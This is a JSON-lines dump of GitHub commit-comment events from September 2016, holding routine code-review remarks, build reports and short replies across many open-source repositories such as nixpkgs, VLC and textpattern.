{"id":"4617978526","type":"CommitCommentEvent","actor":{"login":"zybwh"},"repo":{"name":"zybwh/mud_django"},"payload":{"comment":{"id":19172936,"position":null,"line":null,"path":null,"commit_id":"38057ee381f866a0f5448a04d272d1b467c8c2c3","created_at":"2016-09-26T14:03:43Z","updated_at":"2016-09-26T14:03:43Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [command: interact with npc](https://trello.com/c/sZggRmHS/7-command-interact-with-npc)"}},"created_at":"2016-09-26T14:03:43Z"}
{"id":"4617978713","type":"CommitCommentEvent","actor":{"login":"csgillespie"},"repo":{"name":"csgillespie/efficientR"},"payload":{"comment":{"id":19172937,"position":null,"line":null,"path":null,"commit_id":"efeb50f9737a8fcbe691c162abdb672cb667c678","created_at":"2016-09-26T14:03:45Z","updated_at":"2016-09-26T14:03:45Z","body":"Thanks for testing. Don't think a screenshot is needed. "}},"created_at":"2016-09-26T14:03:45Z"}
{"id":"4617980068","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19172941,"position":3,"line":108,"path":"Karl/integrations/nodejs/test.js","commit_id":"1c5f05a42ea73cd0eb5a11195be7c720123d83ae","created_at":"2016-09-26T14:03:59Z","updated_at":"2016-09-26T14:03:59Z","body":"useless completed flag"}},"created_at":"2016-09-26T14:03:59Z"}
{"id":"4617980909","type":"CommitCommentEvent","actor":{"login":"romansimakov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19172942,"position":90,"line":4202,"path":"src/dsql/parse.y","commit_id":"d1c49980492e07d6616fed8010c13aaebe30a4fc","created_at":"2016-09-26T14:04:06Z","updated_at":"2016-09-26T14:04:06Z","body":"Thanks. Will fix."}},"created_at":"2016-09-26T14:04:06Z"}
{"id":"4617982069","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19172948,"position":null,"line":null,"path":null,"commit_id":"e9917fecc9f6031c160506a047bc1629af8c748c","created_at":"2016-09-26T14:04:16Z","updated_at":"2016-09-26T14:04:16Z","body":"PING: @bjansen :)"}},"created_at":"2016-09-26T14:04:16Z"}
{"id":"4617982992","type":"CommitCommentEvent","actor":{"login":"robUx4"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172951,"position":55,"line":237,"path":"test/libvlc/media_player.c","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T14:04:26Z","updated_at":"2016-09-26T14:04:26Z","body":"#1 it doesn't link or just warn ?\r\n\r\n#2 no, I'll have a look"}},"created_at":"2016-09-26T14:04:26Z"}
{"id":"4617984982","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19172954,"position":null,"line":null,"path":null,"commit_id":"12bd2310ece6a4911bea5dab0b39c6c28b826886","created_at":"2016-09-26T14:04:45Z","updated_at":"2016-09-26T14:04:45Z","body":"1. How on earth did you update so many packages so quick?!\r\n\r\n2. This broke evaluation, because getmail isn't being called with buildPythonApplication."}},"created_at":"2016-09-26T14:04:45Z"}
{"id":"4617986724","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19172959,"position":null,"line":null,"path":null,"commit_id":"f366f8b2f68a9431a8915fc4073825b464d238d8","created_at":"2016-09-26T14:05:02Z","updated_at":"2016-09-26T14:05:02Z","body":":+1: \r\nIt would be nice to have an option to \"chash fct\" that goes with it (like --url=http://sub1.chamilo.org/)"}},"created_at":"2016-09-26T14:05:02Z"}
{"id":"4617987197","type":"CommitCommentEvent","actor":{"login":"cagdasgerede"},"repo":{"name":"cagdasgerede/T-diff"},"payload":{"comment":{"id":19172960,"position":null,"line":null,"path":null,"commit_id":"c9de36e563a5ec37aae6dfee1b2914c5ae04055c","created_at":"2016-09-26T14:05:07Z","updated_at":"2016-09-26T14:05:07Z","body":"Fixes #3 "}},"created_at":"2016-09-26T14:05:07Z"}
{"id":"4617988316","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19172963,"position":null,"line":null,"path":null,"commit_id":"31d4cb7a1ae9bc4b19354acd6621e1f216d53eb3","created_at":"2016-09-26T14:05:17Z","updated_at":"2016-09-26T14:05:17Z","body":"@Stefano80 \r\nI suggest you simply do a pull request.\r\nThis is the best way to get a response from a maintainer..."}},"created_at":"2016-09-26T14:05:17Z"}
{"id":"4617989916","type":"CommitCommentEvent","actor":{"login":"urmaul"},"repo":{"name":"nonzod/yii2-foundation"},"payload":{"comment":{"id":19172968,"position":null,"line":null,"path":null,"commit_id":"03338fe75f0fd8096998d96a0f5a4e7736099037","created_at":"2016-09-26T14:05:33Z","updated_at":"2016-09-26T14:05:33Z","body":"This commit makes input fields disappear when client side validation is on."}},"created_at":"2016-09-26T14:05:33Z"}
{"id":"4617989971","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19172969,"position":null,"line":null,"path":null,"commit_id":"80641d85b463f3437fd396a08cb52e8486fddeb7","created_at":"2016-09-26T14:05:33Z","updated_at":"2016-09-26T14:05:33Z","body":"... yeah. :sweat_smile: Fixed in dddfa5e"}},"created_at":"2016-09-26T14:05:33Z"}
{"id":"4617990775","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/relaxr-landing-page"},"payload":{"comment":{"id":19172971,"position":162,"line":162,"path":"css/style.css","commit_id":"2da4c13db57a5cfbe100d301d5665ad779512d55","created_at":"2016-09-26T14:05:42Z","updated_at":"2016-09-26T14:05:42Z","body":"let's use all lowercase for class names"}},"created_at":"2016-09-26T14:05:42Z"}
{"id":"4617993664","type":"CommitCommentEvent","actor":{"login":"mauryat"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":19172980,"position":447,"line":8289,"path":"Client.xcodeproj/project.pbxproj","commit_id":"9f724fbe8ee46d5ba812fbbfc7235f10df370fb6","created_at":"2016-09-26T14:06:08Z","updated_at":"2016-09-26T14:06:08Z","body":"@farhanpatel I suppose `defaultConfigurationName = Fennec;` is missing here. My Xcode is forcibly adding this to the file even though I have no local changes. "}},"created_at":"2016-09-26T14:06:08Z"}
{"id":"4617996153","type":"CommitCommentEvent","actor":{"login":"aaustin141"},"repo":{"name":"chebfun/chebfun"},"payload":{"comment":{"id":19172984,"position":null,"line":null,"path":null,"commit_id":"c17f07b5b47353f07df0d7c6f4562e19256556e2","created_at":"2016-09-26T14:06:31Z","updated_at":"2016-09-26T14:06:31Z","body":"Never mind---just took a look at some of the rest of the code.  Yes, we have to do a few things inside chebfun itself to handle the quasimatrix case."}},"created_at":"2016-09-26T14:06:31Z"}
{"id":"4617996589","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/relaxr-landing-page"},"payload":{"comment":{"id":19172985,"position":21,"line":21,"path":"index.html","commit_id":"2da4c13db57a5cfbe100d301d5665ad779512d55","created_at":"2016-09-26T14:06:35Z","updated_at":"2016-09-26T14:06:35Z","body":"Why didn't you put these styles in your style.css?"}},"created_at":"2016-09-26T14:06:35Z"}
{"id":"4617998441","type":"CommitCommentEvent","actor":{"login":"mauryat"},"repo":{"name":"mozilla-mobile/firefox-ios"},"payload":{"comment":{"id":19172990,"position":446,"line":8288,"path":"Client.xcodeproj/project.pbxproj","commit_id":"9f724fbe8ee46d5ba812fbbfc7235f10df370fb6","created_at":"2016-09-26T14:06:52Z","updated_at":"2016-09-26T14:06:52Z","body":"@farhanpatel I suppose `defaultConfigurationName = Fennec;` is missing here. My Xcode is forcibly adding this to the file even though I have no local changes. "}},"created_at":"2016-09-26T14:06:52Z"}
{"id":"4617999058","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/relaxr-landing-page"},"payload":{"comment":{"id":19172992,"position":45,"line":45,"path":"index.html","commit_id":"2da4c13db57a5cfbe100d301d5665ad779512d55","created_at":"2016-09-26T14:06:59Z","updated_at":"2016-09-26T14:06:59Z","body":"Let's be more descriptive with our class names."}},"created_at":"2016-09-26T14:06:59Z"}
{"id":"4618005283","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19173004,"position":null,"line":null,"path":null,"commit_id":"12bd2310ece6a4911bea5dab0b39c6c28b826886","created_at":"2016-09-26T14:07:55Z","updated_at":"2016-09-26T14:07:55Z","body":"(evaluation fixed)"}},"created_at":"2016-09-26T14:07:55Z"}
{"id":"4618006759","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19173008,"position":null,"line":null,"path":null,"commit_id":"12bd2310ece6a4911bea5dab0b39c6c28b826886","created_at":"2016-09-26T14:08:09Z","updated_at":"2016-09-26T14:08:09Z","body":"as a bit of background. I removed top-level `buildPythonApplication` just before this bump."}},"created_at":"2016-09-26T14:08:09Z"}
{"id":"4618015534","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19173027,"position":null,"line":null,"path":null,"commit_id":"c91d8db56ceff5b1830e156b7da1e195af366d34","created_at":"2016-09-26T14:09:33Z","updated_at":"2016-09-26T14:09:33Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#V9LUSRdJSWC5Ynk_YEtThQ"}},"created_at":"2016-09-26T14:09:33Z"}
{"id":"4618016171","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"smowton/cbmc"},"payload":{"comment":{"id":19173028,"position":15,"line":15,"path":"src/util/compare_irep_comments.cpp","commit_id":"5442f51e14a92c93b9a1282a687b3c432ee4144f","created_at":"2016-09-26T14:09:39Z","updated_at":"2016-09-26T14:09:39Z","body":"Can we then use operator== and then check the comments? Otherwise, can the common code be factored out together?"}},"created_at":"2016-09-26T14:09:39Z"}
{"id":"4618017106","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19173029,"position":null,"line":null,"path":null,"commit_id":"9e2c48994a06d79ba226a875f72e93449f24a2fe","created_at":"2016-09-26T14:09:47Z","updated_at":"2016-09-26T14:09:47Z","body":"Oops, sorry, failed at rebasing a tested mass update. I hope I haven't at least misapplied anything after git corruption…"}},"created_at":"2016-09-26T14:09:47Z"}
{"id":"4618018172","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"Bkksayjac/bank"},"payload":{"comment":{"id":19173035,"position":null,"line":null,"path":null,"commit_id":"52f503897705c792eaadfedbf14ed6e1e309967b","created_at":"2016-09-26T14:09:57Z","updated_at":"2016-09-26T14:09:57Z","body":"52f5039"}},"created_at":"2016-09-26T14:09:57Z"}
{"id":"4618020604","type":"CommitCommentEvent","actor":{"login":"kangsLee"},"repo":{"name":"triplepy/sh8email-ios"},"payload":{"comment":{"id":19173038,"position":null,"line":null,"path":null,"commit_id":"5c57f36afc02e100a5b232334bdff693f2a6d8f3","created_at":"2016-09-26T14:10:18Z","updated_at":"2016-09-26T14:10:18Z","body":"이그노어를 빼먹다니 ㅎㅎ 감사합니다 ㅎㅎ"}},"created_at":"2016-09-26T14:10:18Z"}
{"id":"4618020678","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19173040,"position":null,"line":null,"path":null,"commit_id":"ce57b6387821de482f0e0e39d5fd2fb6fbfb4f9d","created_at":"2016-09-26T14:10:19Z","updated_at":"2016-09-26T14:10:19Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KJZowAWuTUyUcj8hVnbrOw"}},"created_at":"2016-09-26T14:10:19Z"}
{"id":"4618021708","type":"CommitCommentEvent","actor":{"login":"bestander"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19173043,"position":18,"line":18,"path":"local-cli/upgrade/upgrade.js","commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-26T14:10:28Z","updated_at":"2016-09-26T14:10:28Z","body":"Makes sense, just FYI, some people are going to land a PR with the change to the process any day from now"}},"created_at":"2016-09-26T14:10:28Z"}
{"id":"4618025141","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19173053,"position":16,"line":104,"path":"cura/BuildVolume.py","commit_id":"1cc5d699c4d735cacd4c9a22e11a40ce1c04b05a","created_at":"2016-09-26T14:11:01Z","updated_at":"2016-09-26T14:11:01Z","body":"activeQualityChanged is always emitted after setActiveVariant, setActiveMaterial and setActiveQuality. I've added this in the comment. activeStackChanged is only switching the active stack? activeStackValueChanged is *i think* only emitted when changing values, not when swapping out containers?"}},"created_at":"2016-09-26T14:11:01Z"}
{"id":"4618025474","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"Bkksayjac/bank"},"payload":{"comment":{"id":19173056,"position":1,"line":1,"path":"README.md","commit_id":"52f503897705c792eaadfedbf14ed6e1e309967b","created_at":"2016-09-26T14:11:04Z","updated_at":"2016-09-26T14:11:04Z","body":"https://github.com/Bkksayjac/bank/commit/52f503897705c792eaadfedbf14ed6e1e309967b"}},"created_at":"2016-09-26T14:11:04Z"}
{"id":"4618025708","type":"CommitCommentEvent","actor":{"login":"bloatware"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19173058,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T14:11:07Z","updated_at":"2016-09-26T14:11:07Z","body":"Arghh, the error suppression does not seem to help: the script just fails silently inside a `try` block, without updating `dbupdatetime` preference. When updating to 4.7-dev with insufficient file privileges, I had to delete `LICENSE` files manually again to avoid the update loop."}},"created_at":"2016-09-26T14:11:07Z"}
{"id":"4618027626","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19173061,"position":null,"line":null,"path":null,"commit_id":"3e0522667448484a65559c91f00245763dd2a57c","created_at":"2016-09-26T14:11:25Z","updated_at":"2016-09-26T14:11:25Z","body":"ASIHP-validation1 (shenb) - i386-Windows-7-VisualStudio-12: OK (2324 of 2339 tests passed, 558 test warnings)\n\n * 572 tests had: AUD diffs.\n * 17 tests had: EIO diffs.\n * 7 tests had: ESO small diffs.\n * 10 tests had: ESO big diffs.\n * 4 tests had: MTR big diffs.\n * 12 tests had: Table big diffs.\n * 2 tests had: ERR diffs.\n * 15 tests had: RDD diffs.\n * 1 test had: MTD diffs.\n * 18 tests had: Table small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3e0522667448484a65559c91f00245763dd2a57c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.36%25-yellow.svg)</a> \n"}},"created_at":"2016-09-26T14:11:25Z"}
{"id":"4618027640","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173062,"position":2,"line":2,"path":".rubocop.yml","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:11:25Z","updated_at":"2016-09-26T14:11:25Z","body":"Need to add newline."}},"created_at":"2016-09-26T14:11:25Z"}
{"id":"4618028389","type":"CommitCommentEvent","actor":{"login":"rkdarst"},"repo":{"name":"denzilferreira/aware-client"},"payload":{"comment":{"id":19173065,"position":null,"line":null,"path":null,"commit_id":"d55260daeeef54078e2d9ee5d9fd069930737e77","created_at":"2016-09-26T14:11:33Z","updated_at":"2016-09-26T14:11:33Z","body":"This is quite bad... we used this on our devices, and I can think of at least three that it worked correctly on.  I don't know the versions of the others, but I have (google-distributed) Android 6.0.1.\r\n\r\nBut searching \"android toast won't disappear\", there are many things showing exactly what you say, so it needs to be fixed anyway.  Since I am not an android expert, @denzilferreira, any suggestions?  Realistically I'll get to this tomorrow afternoon or evening, it can be reverted before then if needed."}},"created_at":"2016-09-26T14:11:33Z"}
{"id":"4618028435","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173066,"position":1,"line":1,"path":".ruby-gemset","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:11:33Z","updated_at":"2016-09-26T14:11:33Z","body":"Need to add newline."}},"created_at":"2016-09-26T14:11:33Z"}
{"id":"4618029213","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173067,"position":1,"line":1,"path":".ruby-version","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:11:40Z","updated_at":"2016-09-26T14:11:40Z","body":"Need to add newline."}},"created_at":"2016-09-26T14:11:40Z"}
{"id":"4618030489","type":"CommitCommentEvent","actor":{"login":"Daegon"},"repo":{"name":"ruby-racer/ruby_on_rails_code_part"},"payload":{"comment":{"id":19173073,"position":13,"line":13,"path":"app/assets/javascripts/unsubscribe.js.coffee","commit_id":"eca6f525346a01e160abd1c9b50eb86a33495f0f","created_at":"2016-09-26T14:11:52Z","updated_at":"2016-09-26T14:11:52Z","body":"Use `$(@)` instead of `$(this)`."}},"created_at":"2016-09-26T14:11:52Z"}
{"id":"4618033606","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"csgillespie/efficientR"},"payload":{"comment":{"id":19173084,"position":null,"line":null,"path":null,"commit_id":"efeb50f9737a8fcbe691c162abdb672cb667c678","created_at":"2016-09-26T14:12:22Z","updated_at":"2016-09-26T14:12:22Z","body":":+1: "}},"created_at":"2016-09-26T14:12:22Z"}
{"id":"4618035759","type":"CommitCommentEvent","actor":{"login":"geerlingguy"},"repo":{"name":"geerlingguy/ansible-role-mysql"},"payload":{"comment":{"id":19173089,"position":null,"line":null,"path":null,"commit_id":"813fa1399046e54ebc58285f217f847a41d18536","created_at":"2016-09-26T14:12:42Z","updated_at":"2016-09-26T14:12:42Z","body":"@JorisVanEijden - Thanks! Didn't remember that PR until just now, merged and looks great."}},"created_at":"2016-09-26T14:12:42Z"}
{"id":"4618035967","type":"CommitCommentEvent","actor":{"login":"7c6f434c"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19173090,"position":null,"line":null,"path":null,"commit_id":"12bd2310ece6a4911bea5dab0b39c6c28b826886","created_at":"2016-09-26T14:12:44Z","updated_at":"2016-09-26T14:12:44Z","body":">as a bit of background. I removed top-level `buildPythonApplication` just before this bump.\n\nYes, it is quite clear post-factum.\n\n\n\n"}},"created_at":"2016-09-26T14:12:44Z"}
{"id":"4618038190","type":"CommitCommentEvent","actor":{"login":"ncuillery"},"repo":{"name":"ncuillery/react-native"},"payload":{"comment":{"id":19173095,"position":null,"line":null,"path":null,"commit_id":"838b6c8121e15e29fe0f03cda6410933c35e1d7a","created_at":"2016-09-26T14:13:06Z","updated_at":"2016-09-26T14:13:06Z","body":"It would be great, but it doesn't 😄\r\nI think the available ES6/ES7 features are those which are compatible with the installed Node.JS version.\r\n\r\nThat's why I used Promise. I'm totally open about other implementations, but I have the impression that async/await can be polyfilled. Promise seems to be the best compromise 😢 "}},"created_at":"2016-09-26T14:13:06Z"}
{"id":"4618039201","type":"CommitCommentEvent","actor":{"login":"Daegon"},"repo":{"name":"ruby-racer/ruby_on_rails_code_part"},"payload":{"comment":{"id":19173098,"position":22,"line":22,"path":"app/controllers/unsubscribes_controller.rb","commit_id":"eca6f525346a01e160abd1c9b50eb86a33495f0f","created_at":"2016-09-26T14:13:15Z","updated_at":"2016-09-26T14:13:15Z","body":"Without translation?"}},"created_at":"2016-09-26T14:13:15Z"}
{"id":"4618040027","type":"CommitCommentEvent","actor":{"login":"cnmcavoy"},"repo":{"name":"chef-cookbooks/dmg"},"payload":{"comment":{"id":19173102,"position":4,"line":5,"path":"CHANGELOG.md","commit_id":"985b56da41ad71de1287043fa30b73dbd0590543","created_at":"2016-09-26T14:13:25Z","updated_at":"2016-09-26T14:13:25Z","body":"Am I missing something? I don't see 3.0.0 in the [supermarket](https://supermarket.chef.io/cookbooks/dmg) or git tags here."}},"created_at":"2016-09-26T14:13:25Z"}
{"id":"4618043481","type":"CommitCommentEvent","actor":{"login":"Bloke"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19173114,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T14:13:58Z","updated_at":"2016-09-26T14:13:58Z","body":"Nuts, thanks for testing. Any ideas for improvement, be my guest!"}},"created_at":"2016-09-26T14:13:58Z"}
{"id":"4618048262","type":"CommitCommentEvent","actor":{"login":"johnnyjacob"},"repo":{"name":"johnnyjacob/launchalert"},"payload":{"comment":{"id":19173123,"position":28,"line":24,"path":"popup.js","commit_id":"11358482c921f66a5d32bfd9472f8bccb44c09f4","created_at":"2016-09-26T14:14:41Z","updated_at":"2016-09-26T14:14:41Z","body":"@bipinu I think we need to add these images into manifest.json ? \r\n\r\nAs per : http://stackoverflow.com/questions/11804332/insert-an-image-in-chrome-extension"}},"created_at":"2016-09-26T14:14:41Z"}
{"id":"4618048423","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173125,"position":7,"line":7,"path":"app/admin/booking_request.rb","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:14:43Z","updated_at":"2016-09-26T14:14:43Z","body":"String is too long."}},"created_at":"2016-09-26T14:14:43Z"}
{"id":"4618049470","type":"CommitCommentEvent","actor":{"login":"robUx4"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19173128,"position":51,"line":1217,"path":"include/vlc/libvlc_media_player.h","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T14:14:53Z","updated_at":"2016-09-26T14:14:53Z","body":"I used the same as `libvlc_video_take_snapshot()`"}},"created_at":"2016-09-26T14:14:53Z"}
{"id":"4618051002","type":"CommitCommentEvent","actor":{"login":"luk1337"},"repo":{"name":"CyanogenMod/android_device_motorola_thea"},"payload":{"comment":{"id":19173131,"position":null,"line":null,"path":null,"commit_id":"74a0e4b901ad09c516df951ccf6b2ea278c7ae08","created_at":"2016-09-26T14:15:08Z","updated_at":"2016-09-26T14:15:08Z","body":"That's weird, I am pretty sure it works here."}},"created_at":"2016-09-26T14:15:08Z"}
{"id":"4618053096","type":"CommitCommentEvent","actor":{"login":"ManaiMohamedSelim"},"repo":{"name":"ManaiMohamedSelim/MiniProjetTest"},"payload":{"comment":{"id":19173135,"position":null,"line":null,"path":null,"commit_id":"5d60381e8b4d81233d518a03889798e31dadfc41","created_at":"2016-09-26T14:15:28Z","updated_at":"2016-09-26T14:15:28Z","body":"Selim"}},"created_at":"2016-09-26T14:15:28Z"}
{"id":"4618053799","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19173138,"position":null,"line":null,"path":null,"commit_id":"19b82f5106545d350fa9eddd69896db8d6963aec","created_at":"2016-09-26T14:15:34Z","updated_at":"2016-09-26T14:15:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#WwtCzEBlT32u-8b1zPVVHw"}},"created_at":"2016-09-26T14:15:34Z"}
{"id":"4618056859","type":"CommitCommentEvent","actor":{"login":"Bloke"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19173142,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-26T14:16:02Z","updated_at":"2016-09-26T14:16:02Z","body":"And if \"improvements\" means ditching the deletion part of the update script and advising people to remove the files manually via messages in the Pre-flight check then that's fine with me."}},"created_at":"2016-09-26T14:16:02Z"}
{"id":"4618058353","type":"CommitCommentEvent","actor":{"login":"ManaiMohamedSelim"},"repo":{"name":"ManaiMohamedSelim/MiniProjetTest"},"payload":{"comment":{"id":19173146,"position":null,"line":null,"path":null,"commit_id":"5d60381e8b4d81233d518a03889798e31dadfc41","created_at":"2016-09-26T14:16:17Z","updated_at":"2016-09-26T14:16:17Z","body":"test"}},"created_at":"2016-09-26T14:16:17Z"}
{"id":"4618058627","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173150,"position":5,"line":5,"path":"app/admin/event.rb","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:16:20Z","updated_at":"2016-09-26T14:16:20Z","body":"Use %i() instead of []."}},"created_at":"2016-09-26T14:16:20Z"}
{"id":"4618060190","type":"CommitCommentEvent","actor":{"login":"Daegon"},"repo":{"name":"ruby-racer/ruby_on_rails_code_part"},"payload":{"comment":{"id":19173153,"position":23,"line":23,"path":"app/views/messaging/tabs/_unsubscribes.html.haml","commit_id":"eca6f525346a01e160abd1c9b50eb86a33495f0f","created_at":"2016-09-26T14:16:34Z","updated_at":"2016-09-26T14:16:34Z","body":"Думаю краще відрендерити в циклі ці \"li\"."}},"created_at":"2016-09-26T14:16:34Z"}
{"id":"4618062087","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"github/git-lfs"},"payload":{"comment":{"id":19173156,"position":null,"line":null,"path":null,"commit_id":"32c557a497406051ab2f1ba8722f9bfb889d2d8a","created_at":"2016-09-26T14:16:53Z","updated_at":"2016-09-26T14:16:53Z","body":"32c557a"}},"created_at":"2016-09-26T14:16:53Z"}
{"id":"4618063114","type":"CommitCommentEvent","actor":{"login":"yottabyte"},"repo":{"name":"meemsbror/DAT255"},"payload":{"comment":{"id":19173160,"position":null,"line":null,"path":null,"commit_id":"d1153045084c91f174857e507fb0d1ddebf077be","created_at":"2016-09-26T14:17:03Z","updated_at":"2016-09-26T14:17:03Z","body":"sjuk i huvudet\r\n"}},"created_at":"2016-09-26T14:17:03Z"}
{"id":"4618063925","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"github/git-lfs"},"payload":{"comment":{"id":19173162,"position":42,"line":51,"path":"api/lock_api_test.go","commit_id":"32c557a497406051ab2f1ba8722f9bfb889d2d8a","created_at":"2016-09-26T14:17:10Z","updated_at":"2016-09-26T14:17:10Z","body":"32c557a"}},"created_at":"2016-09-26T14:17:10Z"}
{"id":"4618064566","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173165,"position":55,"line":55,"path":"app/admin/event.rb","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:17:15Z","updated_at":"2016-09-26T14:17:15Z","body":"String is too long."}},"created_at":"2016-09-26T14:17:15Z"}
{"id":"4618065543","type":"CommitCommentEvent","actor":{"login":"jonathasp6"},"repo":{"name":"jonathasp6/ArctouchBus"},"payload":{"comment":{"id":19173170,"position":35,"line":35,"path":"app/src/main/java/br/com/arctouch/arctouchbus/ArctouchBus.java","commit_id":"a1af8aa2379496dd9fa7c1f26c1e8392166e44de","created_at":"2016-09-26T14:17:24Z","updated_at":"2016-09-26T14:17:24Z","body":"It was a test that I was doing. I forgot to remove it. "}},"created_at":"2016-09-26T14:17:24Z"}
{"id":"4618065566","type":"CommitCommentEvent","actor":{"login":"Bkksayjac"},"repo":{"name":"github/git-lfs"},"payload":{"comment":{"id":19173171,"position":42,"line":51,"path":"api/lock_api_test.go","commit_id":"32c557a497406051ab2f1ba8722f9bfb889d2d8a","created_at":"2016-09-26T14:17:24Z","updated_at":"2016-09-26T14:17:24Z","body":"32c557a"}},"created_at":"2016-09-26T14:17:24Z"}
{"id":"4618066808","type":"CommitCommentEvent","actor":{"login":"massmediagroup-11"},"repo":{"name":"ruby-racer/rails_code_presentation"},"payload":{"comment":{"id":19173176,"position":66,"line":66,"path":"app/admin/event.rb","commit_id":"e0ef4958d34a9fab53958a745bec4ec587b70530","created_at":"2016-09-26T14:17:34Z","updated_at":"2016-09-26T14:17:34Z","body":"String is too long. Use \"do ... end\"."}},"created_at":"2016-09-26T14:17:34Z"}
{"id":"4618069384","type":"CommitCommentEvent","actor":{"login":"robUx4"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19173178,"position":56,"line":1222,"path":"include/vlc/libvlc_media_player.h","commit_id":"0215c985894f57cdfc58938e363562be56961003","created_at":"2016-09-26T14:17:55Z","updated_at":"2016-09-26T14:17:55Z","body":"It doesn't have any effect \"before\". It's just kept for later. I'll try a different wording."}},"created_at":"2016-09-26T14:17:55Z"}
